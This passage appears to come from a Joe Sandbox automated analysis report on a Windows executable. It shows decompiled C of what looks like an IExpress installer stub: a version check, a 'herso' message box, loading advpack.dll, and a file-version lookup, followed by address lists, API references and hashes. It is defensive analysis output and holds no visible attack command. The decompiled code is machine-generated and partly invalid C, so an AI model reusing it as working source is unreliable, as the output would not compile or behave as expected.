                                                                                                                                                                                                          												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                          												_v420 =  &_v268;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t124;
                                                                                                                                                                                                          											if(_t124 == 0) {
                                                                                                                                                                                                          												_t135 = _v436;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t99 = _t124[0x30];
                                                                                                                                                                                                          												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                          												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                          												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                          													asm("sbb ebx, ebx");
                                                                                                                                                                                                          													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t115 = 0x104;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags =  *0x868a38 & 0x00000001;
                                                                                                                                                                                                          											if(( *0x868a38 & 0x00000001) != 0) {
                                                                                                                                                                                                          												L64:
                                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                                          												_push(0x30);
                                                                                                                                                                                                          												_push(_v420);
                                                                                                                                                                                                          												_push("herso");
                                                                                                                                                                                                          												goto L65;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__eflags = _t135;
                                                                                                                                                                                                          												if(_t135 == 0) {
                                                                                                                                                                                                          													goto L64;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags =  *_t135;
                                                                                                                                                                                                          												if( *_t135 == 0) {
                                                                                                                                                                                                          													goto L64;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												MessageBeep(0);
                                                                                                                                                                                                          												_t94 = E0086681F(_t115);
                                                                                                                                                                                                          												__eflags = _t94;
                                                                                                                                                                                                          												if(_t94 == 0) {
                                                                                                                                                                                                          													L57:
                                                                                                                                                                                                          													0x180030 = 0x30;
                                                                                                                                                                                                          													L58:
                                                                                                                                                                                                          													_t97 = MessageBoxA(0, _t135, "herso", 0x00180030 | _t115);
                                                                                                                                                                                                          													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                          													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                          														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                          														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                          															goto L66;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														__eflags = _t97 - 1;
                                                                                                                                                                                                          														L62:
                                                                                                                                                                                                          														if(__eflags == 0) {
                                                                                                                                                                                                          															_t138 = 0;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L66;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = _t97 - 6;
                                                                                                                                                                                                          													goto L62;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t98 = E008667C9(_t124, _t124);
                                                                                                                                                                                                          												__eflags = _t98;
                                                                                                                                                                                                          												if(_t98 == 0) {
                                                                                                                                                                                                          													goto L57;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L58;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                          										if(_t138 == 0x54c) {
                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _t138;
                                                                                                                                                                                                          										if(_t138 == 0) {
                                                                                                                                                                                                          											goto L66;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t135 = 0;
                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                          										goto L44;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									L37:
                                                                                                                                                                                                          									_t129 = _v432;
                                                                                                                                                                                                          									__eflags = _t129[0x7c];
                                                                                                                                                                                                          									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                          										goto L66;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t133 =  &_v268;
                                                                                                                                                                                                          									_t104 = E008628E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                          									__eflags = _t104;
                                                                                                                                                                                                          									if(_t104 != 0) {
                                                                                                                                                                                                          										goto L66;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t135 = _v428;
                                                                                                                                                                                                          									_t133 = 0x54d;
                                                                                                                                                                                                          									_t138 = 0x54d;
                                                                                                                                                                                                          									goto L40;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L33;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t91;
                                                                                                                                                                                                          							if(_t91 > 0) {
                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t123;
                                                                                                                                                                                                          							if(_t123 != 0) {
                                                                                                                                                                                                          								__eflags = _t91;
                                                                                                                                                                                                          								if(_t91 != 0) {
                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                          								L27:
                                                                                                                                                                                                          								if(__eflags <= 0) {
                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L28:
                                                                                                                                                                                                          								__eflags = _t135;
                                                                                                                                                                                                          								if(_t135 == 0) {
                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t138 = 0x54c;
                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t91;
                                                                                                                                                                                                          							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                          							if(_t91 != 0) {
                                                                                                                                                                                                          								_t131 = _v424;
                                                                                                                                                                                                          								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                          								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L28;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                          							_t109 = _v424;
                                                                                                                                                                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                          							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                          								goto L28;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                          							goto L27;
                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                          							_t135 =  &(_t135[1]);
                                                                                                                                                                                                          							_v428 = _t135;
                                                                                                                                                                                                          							_v420 = _t135;
                                                                                                                                                                                                          							__eflags = _t135 - 2;
                                                                                                                                                                                                          						} while (_t135 < 2);
                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__eflags = _t77 == 1;
                                                                                                                                                                                                          					if(_t77 == 1) {
                                                                                                                                                                                                          						 *0x869a40 = _t119;
                                                                                                                                                                                                          						 *0x868184 = 1;
                                                                                                                                                                                                          						 *0x868180 = 1;
                                                                                                                                                                                                          						__eflags = _t133 - 3;
                                                                                                                                                                                                          						if(_t133 > 3) {
                                                                                                                                                                                                          							__eflags = _t133 - 5;
                                                                                                                                                                                                          							if(_t133 < 5) {
                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t113 = 3;
                                                                                                                                                                                                          							_t119 = _t113;
                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t119 = 1;
                                                                                                                                                                                                          						_t114 = 3;
                                                                                                                                                                                                          						 *0x869a40 = 1;
                                                                                                                                                                                                          						__eflags = _t133 - _t114;
                                                                                                                                                                                                          						if(__eflags < 0) {
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							 *0x868184 = _t135;
                                                                                                                                                                                                          							 *0x868180 = _t135;
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                          						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t138 = 0x4ca;
                                                                                                                                                                                                          					goto L44;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t138 = 0x4b4;
                                                                                                                                                                                                          					L44:
                                                                                                                                                                                                          					_push(_t135);
                                                                                                                                                                                                          					_push(0x10);
                                                                                                                                                                                                          					_push(_t135);
                                                                                                                                                                                                          					_push(_t135);
                                                                                                                                                                                                          					L65:
                                                                                                                                                                                                          					_t133 = _t138;
                                                                                                                                                                                                          					E008644B9(0, _t138);
                                                                                                                                                                                                          					L66:
                                                                                                                                                                                                          					return E00866CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





































                                                                                                                                                                                                          0x008636f9
                                                                                                                                                                                                          0x00863700
                                                                                                                                                                                                          0x0086370c
                                                                                                                                                                                                          0x00863716
                                                                                                                                                                                                          0x00863718
                                                                                                                                                                                                          0x0086371b
                                                                                                                                                                                                          0x00863721
                                                                                                                                                                                                          0x0086372b
                                                                                                                                                                                                          0x0086373d
                                                                                                                                                                                                          0x00863745
                                                                                                                                                                                                          0x00863746
                                                                                                                                                                                                          0x00863746
                                                                                                                                                                                                          0x00863749
                                                                                                                                                                                                          0x008637ab
                                                                                                                                                                                                          0x008637ad
                                                                                                                                                                                                          0x008637ae
                                                                                                                                                                                                          0x008637b3
                                                                                                                                                                                                          0x008637b8
                                                                                                                                                                                                          0x008637b8
                                                                                                                                                                                                          0x008637bf
                                                                                                                                                                                                          0x008637bf
                                                                                                                                                                                                          0x008637c5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008637cb
                                                                                                                                                                                                          0x008637cd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008637d5
                                                                                                                                                                                                          0x008637db
                                                                                                                                                                                                          0x008637e8
                                                                                                                                                                                                          0x008637ea
                                                                                                                                                                                                          0x008637ea
                                                                                                                                                                                                          0x008637ea
                                                                                                                                                                                                          0x008637f0
                                                                                                                                                                                                          0x008637f6
                                                                                                                                                                                                          0x00863805
                                                                                                                                                                                                          0x00863817
                                                                                                                                                                                                          0x0086382b
                                                                                                                                                                                                          0x00863830
                                                                                                                                                                                                          0x00863836
                                                                                                                                                                                                          0x0086383b
                                                                                                                                                                                                          0x0086383d
                                                                                                                                                                                                          0x008638eb
                                                                                                                                                                                                          0x008638eb
                                                                                                                                                                                                          0x008638f2
                                                                                                                                                                                                          0x0086390c
                                                                                                                                                                                                          0x00863911
                                                                                                                                                                                                          0x00863911
                                                                                                                                                                                                          0x00863913
                                                                                                                                                                                                          0x0086394d
                                                                                                                                                                                                          0x0086394d
                                                                                                                                                                                                          0x0086394f
                                                                                                                                                                                                          0x008638a9
                                                                                                                                                                                                          0x008638a9
                                                                                                                                                                                                          0x008638b0
                                                                                                                                                                                                          0x008638b2
                                                                                                                                                                                                          0x008638b9
                                                                                                                                                                                                          0x008638bb
                                                                                                                                                                                                          0x008638c1
                                                                                                                                                                                                          0x00863975
                                                                                                                                                                                                          0x008638c7
                                                                                                                                                                                                          0x008638de
                                                                                                                                                                                                          0x008638e0
                                                                                                                                                                                                          0x008638e0
                                                                                                                                                                                                          0x0086397b
                                                                                                                                                                                                          0x0086397d
                                                                                                                                                                                                          0x008639a9
                                                                                                                                                                                                          0x0086397f
                                                                                                                                                                                                          0x00863982
                                                                                                                                                                                                          0x0086398b
                                                                                                                                                                                                          0x0086398d
                                                                                                                                                                                                          0x0086398f
                                                                                                                                                                                                          0x0086399f
                                                                                                                                                                                                          0x008639a1
                                                                                                                                                                                                          0x00863991
                                                                                                                                                                                                          0x00863991
                                                                                                                                                                                                          0x00863991
                                                                                                                                                                                                          0x0086398f
                                                                                                                                                                                                          0x008639af
                                                                                                                                                                                                          0x008639b6
                                                                                                                                                                                                          0x00863a0f
                                                                                                                                                                                                          0x00863a0f
                                                                                                                                                                                                          0x00863a11
                                                                                                                                                                                                          0x00863a13
                                                                                                                                                                                                          0x00863a19
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639b8
                                                                                                                                                                                                          0x008639b8
                                                                                                                                                                                                          0x008639ba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639bc
                                                                                                                                                                                                          0x008639bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639c3
                                                                                                                                                                                                          0x008639c9
                                                                                                                                                                                                          0x008639ce
                                                                                                                                                                                                          0x008639d0
                                                                                                                                                                                                          0x008639e3
                                                                                                                                                                                                          0x008639e5
                                                                                                                                                                                                          0x008639e6
                                                                                                                                                                                                          0x008639f1
                                                                                                                                                                                                          0x008639f7
                                                                                                                                                                                                          0x008639fa
                                                                                                                                                                                                          0x00863a01
                                                                                                                                                                                                          0x00863a04
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863a06
                                                                                                                                                                                                          0x00863a09
                                                                                                                                                                                                          0x00863a09
                                                                                                                                                                                                          0x00863a0b
                                                                                                                                                                                                          0x00863a0b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863a09
                                                                                                                                                                                                          0x008639fc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639fc
                                                                                                                                                                                                          0x008639d3
                                                                                                                                                                                                          0x008639d8
                                                                                                                                                                                                          0x008639da
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639dc
                                                                                                                                                                                                          0x008639b6
                                                                                                                                                                                                          0x00863955
                                                                                                                                                                                                          0x0086395b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863961
                                                                                                                                                                                                          0x00863963
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863969
                                                                                                                                                                                                          0x00863969
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863969
                                                                                                                                                                                                          0x00863915
                                                                                                                                                                                                          0x00863915
                                                                                                                                                                                                          0x0086391b
                                                                                                                                                                                                          0x0086391f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086392d
                                                                                                                                                                                                          0x00863933
                                                                                                                                                                                                          0x00863938
                                                                                                                                                                                                          0x0086393a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863940
                                                                                                                                                                                                          0x00863946
                                                                                                                                                                                                          0x0086394b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086394b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008638f2
                                                                                                                                                                                                          0x00863843
                                                                                                                                                                                                          0x00863845
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086384b
                                                                                                                                                                                                          0x0086384d
                                                                                                                                                                                                          0x00863883
                                                                                                                                                                                                          0x00863885
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086389a
                                                                                                                                                                                                          0x0086389e
                                                                                                                                                                                                          0x0086389e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008638a0
                                                                                                                                                                                                          0x008638a0
                                                                                                                                                                                                          0x008638a2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008638a4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008638a4
                                                                                                                                                                                                          0x0086384f
                                                                                                                                                                                                          0x00863851
                                                                                                                                                                                                          0x00863857
                                                                                                                                                                                                          0x0086386e
                                                                                                                                                                                                          0x00863877
                                                                                                                                                                                                          0x0086387b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863881
                                                                                                                                                                                                          0x00863859
                                                                                                                                                                                                          0x0086385c
                                                                                                                                                                                                          0x00863862
                                                                                                                                                                                                          0x00863866
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863868
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008638f4
                                                                                                                                                                                                          0x008638f4
                                                                                                                                                                                                          0x008638f5
                                                                                                                                                                                                          0x008638fb
                                                                                                                                                                                                          0x00863901
                                                                                                                                                                                                          0x00863901
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086390a
                                                                                                                                                                                                          0x0086374b
                                                                                                                                                                                                          0x0086374e
                                                                                                                                                                                                          0x0086375c
                                                                                                                                                                                                          0x00863764
                                                                                                                                                                                                          0x00863769
                                                                                                                                                                                                          0x0086376e
                                                                                                                                                                                                          0x00863771
                                                                                                                                                                                                          0x0086379c
                                                                                                                                                                                                          0x0086379f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008637a3
                                                                                                                                                                                                          0x008637a4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008637a4
                                                                                                                                                                                                          0x00863773
                                                                                                                                                                                                          0x00863777
                                                                                                                                                                                                          0x00863778
                                                                                                                                                                                                          0x0086377f
                                                                                                                                                                                                          0x00863781
                                                                                                                                                                                                          0x0086378e
                                                                                                                                                                                                          0x0086378e
                                                                                                                                                                                                          0x00863794
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863794
                                                                                                                                                                                                          0x00863783
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863785
                                                                                                                                                                                                          0x0086378c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086378c
                                                                                                                                                                                                          0x00863750
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086372d
                                                                                                                                                                                                          0x0086372d
                                                                                                                                                                                                          0x0086396b
                                                                                                                                                                                                          0x0086396b
                                                                                                                                                                                                          0x0086396c
                                                                                                                                                                                                          0x0086396e
                                                                                                                                                                                                          0x0086396f
                                                                                                                                                                                                          0x00863a1e
                                                                                                                                                                                                          0x00863a1e
                                                                                                                                                                                                          0x00863a22
                                                                                                                                                                                                          0x00863a27
                                                                                                                                                                                                          0x00863a3e
                                                                                                                                                                                                          0x00863a3e

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00863723
                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 008639C3
                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,herso,00000030), ref: 008639F1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$BeepVersion
                                                                                                                                                                                                          • String ID: 3$herso
                                                                                                                                                                                                          • API String ID: 2519184315-3003840238
                                                                                                                                                                                                          • Opcode ID: 81f15a74ee3d0f1e08226f578bb0b13c6d6bf98476e4c16d5eb67f5bc66fcf7a
                                                                                                                                                                                                          • Instruction ID: a23a60edc0ff8618498053c39a872aee016fc8e21b52c8caa1e3080793482993
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81f15a74ee3d0f1e08226f578bb0b13c6d6bf98476e4c16d5eb67f5bc66fcf7a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0891E4B1A012289BDB358F54CD81BEA77B5FB46305F1701A9D88AEB291DB708F80DF41
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                          			E00866495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				signed char _t14;
                                                                                                                                                                                                          				struct HINSTANCE__* _t15;
                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                          				CHAR* _t26;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                          				_t18 = __ebx;
                                                                                                                                                                                                          				_t9 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				E00861781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          				_t26 = "advpack.dll";
                                                                                                                                                                                                          				E0086658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                          				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                          				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                          					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          0x00866495
                                                                                                                                                                                                          0x00866495
                                                                                                                                                                                                          0x008664a0
                                                                                                                                                                                                          0x008664a7
                                                                                                                                                                                                          0x008664ab
                                                                                                                                                                                                          0x008664bd
                                                                                                                                                                                                          0x008664c2
                                                                                                                                                                                                          0x008664d3
                                                                                                                                                                                                          0x008664df
                                                                                                                                                                                                          0x008664e8
                                                                                                                                                                                                          0x00866502
                                                                                                                                                                                                          0x008664ee
                                                                                                                                                                                                          0x008664f9
                                                                                                                                                                                                          0x008664f9
                                                                                                                                                                                                          0x00866516

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008664DF
                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008664F9
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00866502
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                          • API String ID: 438848745-258089097
                                                                                                                                                                                                          • Opcode ID: f3cc4ed23d8f082296f1dd5e000f4f42fd901d50815d75d335ad8f97cfcda1c7
                                                                                                                                                                                                          • Instruction ID: 935ccaf4d8dcd6eca00e25961a7393b4d4d61a8dfad586d08c1f3f194e50ab5e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3cc4ed23d8f082296f1dd5e000f4f42fd901d50815d75d335ad8f97cfcda1c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01D630904108EBDB54DB64DC4AAEA7378FB61314F520195F596E21C0EFB09E998B52
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008628E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                          				long _t68;
                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                          				intOrPtr _t93;
                                                                                                                                                                                                          				intOrPtr _t97;
                                                                                                                                                                                                          				intOrPtr _t99;
                                                                                                                                                                                                          				int _t101;
                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                                          				_t99 = __ecx;
                                                                                                                                                                                                          				_t106 = 0;
                                                                                                                                                                                                          				_v16 = __ecx;
                                                                                                                                                                                                          				_t87 = 0;
                                                                                                                                                                                                          				_t103 = 0;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                          					_t106 = 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t62 = 0;
                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                          						if(E00862773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                          						_v28 = _t68;
                                                                                                                                                                                                          						if(_t68 == 0) {
                                                                                                                                                                                                          							_t99 = _v16;
                                                                                                                                                                                                          							_t70 = _v8 + _t99;
                                                                                                                                                                                                          							_t93 = _v24;
                                                                                                                                                                                                          							_t87 = _v20;
                                                                                                                                                                                                          							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                          							if(_t103 != 0) {
                                                                                                                                                                                                          								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                          								_v36 = _t73;
                                                                                                                                                                                                          								if(_t73 != 0) {
